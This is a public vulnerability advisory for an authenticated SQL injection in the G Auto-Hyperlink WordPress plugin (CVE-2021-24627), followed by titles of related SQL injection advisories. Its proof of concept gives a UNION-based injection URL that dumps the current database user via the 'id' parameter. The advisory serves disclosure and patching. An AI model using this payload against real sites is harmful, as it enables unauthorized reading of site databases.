G Auto-Hyperlink <= 1.0.1 – Admin+ SQL Injection | CVE 2021-24627 | Plugin Vulnerabilities

Description

The plugin does not sanitise or escape an 'id' GET parameter before using it in a SQL statement, to select data to be displayed in the admin dashboard, leading to an authenticated SQL injection

Proof of Concept

https://plugins.trac.wordpress.org/browser/g-auto-hyperlink/trunk/g-auto-hyperlink.php#L271

Open the follow URL as admin, which will output the current DB user: https://exxample.com/wp-admin/admin.php?page=g-auto-hyperlink-edit&id=-2198+UNION+ALL+SELECT+NULL%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2Ccurrent_user%28%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--

Affects Plugins

g-auto-hyperlink

No known fix

References

CVE

URL

https://codevigilant.com/disclosure/2021/wp-plugin-g-auto-hyperlink/

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Shreya Pohekar of Codevigilant Project

Verified

Yes

WPVDB ID

c04ea768-150f-41b8-b08c-78d1ae006bbb

Timeline

Publicly Published

2021-10-07 (about 4 years ago)

Added

2021-10-07 (about 4 years ago)

Last Updated

2022-04-12 (about 3 years ago)

Other

Published

Title

Published

2021-11-22

Title

Ni WooCommerce Custom Order Status < 1.9.7 - Subscriber+ SQL Injection

Published

2022-05-30

Title

Events Made Easy < 2.2.81 - Unauthenticated SQLi

Published

2022-11-30

Title

IWS - Geo Form Fields <= 1.0 - Unauthenticated SQLi

Published

2025-03-31

Title

RSVPMarker < 11.6.8 - Unauthenticated SQL Injection

Published

2014-08-01

Title

WP-Predict 1.0 - Blind SQL Injection